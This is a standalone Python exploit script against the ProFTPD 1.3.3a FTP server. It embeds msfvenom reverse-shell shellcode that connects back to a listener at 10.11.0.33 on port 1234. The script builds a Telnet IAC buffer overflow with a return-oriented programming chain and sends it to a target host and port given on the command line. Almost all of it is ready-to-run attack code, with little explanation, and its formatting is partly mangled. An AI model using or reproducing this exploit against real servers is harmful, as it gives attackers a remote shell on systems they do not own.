import sys, socket
# Use in the form “python .py
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
# Target: ProFTPD 1.3.3a Server (Debian) – Squeeze Beta1
#payload disablenop + badchars \x09\x0a\x0b\x0c\x0d\x20\xff
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.33 LPORT=1234 CMD=/bin/sh -b ‘\x09\x0a\x0b\x0c\x0d\x20\xff’ -f python
import random
import string
buf = “”
buf += “\xba\x7f\xd0\x96\x36\xda\xd1\xd9\x74\x24\xf4\x5e\x29”
buf += “\xc9\xb1\x12\x31\x56\x12\x83\xc6\x04\x03\x29\xde\x74”
buf += “\xc3\xe4\x05\x8f\xcf\x55\xf9\x23\x7a\x5b\x74\x22\xca”
buf += “\x3d\x4b\x25\xb8\x98\xe3\x19\x72\x9a\x4d\x1f\x75\xf2”
buf += “\x47\xd4\x85\x23\x30\xe8\x85\x27\x12\x65\x64\x97\xf4”
buf += “\x26\x36\x84\x4b\xc5\x31\xcb\x61\x4a\x13\x63\x14\x64”
buf += “\xe7\x1b\x80\x55\x28\xb9\x39\x23\xd5\x6f\xe9\xba\xfb”
buf += “\x3f\x06\x70\x7b”
payload = buf
IACCount = 4096+16
Offset = 0x00001028 # 0x102c-4
Ret = “\x47\xa5\x05\x08” #’0x805a547′
Writable = “\xa0\x81\x0e\x08” # “‘0x80e81a0’ #data
RopStack = ‘\xcc\xcc\xcc\xcc’ + ‘\x44\xa5\x05\x08’ + ‘\xcc\xcc\xcc\xcc’ *3 + ‘\x86\x88\x06\x08’ *4
RopStack += “\x8e\xbd\x05\x08” * 16 + “\x6c\xc2\x05\x08”
# Writable is here
# { 0xcccccccc, # unused
# 0x805a544, # mov eax,esi / pop ebx / pop esi / pop ebp / ret
# 0xcccccccc, # becomes ebx
# 0xcccccccc, # becomes esi
## 0xcccccccc, # becomes ebp
# # quadruple deref the res pointer 🙂
# 0x8068886, # mov eax,[eax] / ret
# 0x8068886, # mov eax,[eax] / ret
# 0x8068886, # mov eax,[eax] / ret
# 0x8068886, # mov eax,[eax] / ret
# # skip the pool chunk header
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
# 0x805bd8e, # inc eax / adc cl, cl / ret
#
# # execute the data 🙂
# 0x0805c26c, # jmp eax
# }
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(5)
client.connect((host,port))
banner= client.recv(1024)
print banner
#client.sendto(exploit, (host, port)) # Send the exploit over UDP to the nominated addresses
buf = ‘SITE ‘
#no cookieoffset buf += “\x8d\xa0\xfc\xdf\xff\xff”
buf += payload
if (len(buf) %2 ==0):
buf += ‘A’
buf += “\xff” *(IACCount – len(payload))
rndb = (Offset – len(buf))
buf += “\x41” * rndb
addrs = Ret + Writable + RopStack
buf += addrs + “\r\n”
client.send(buf);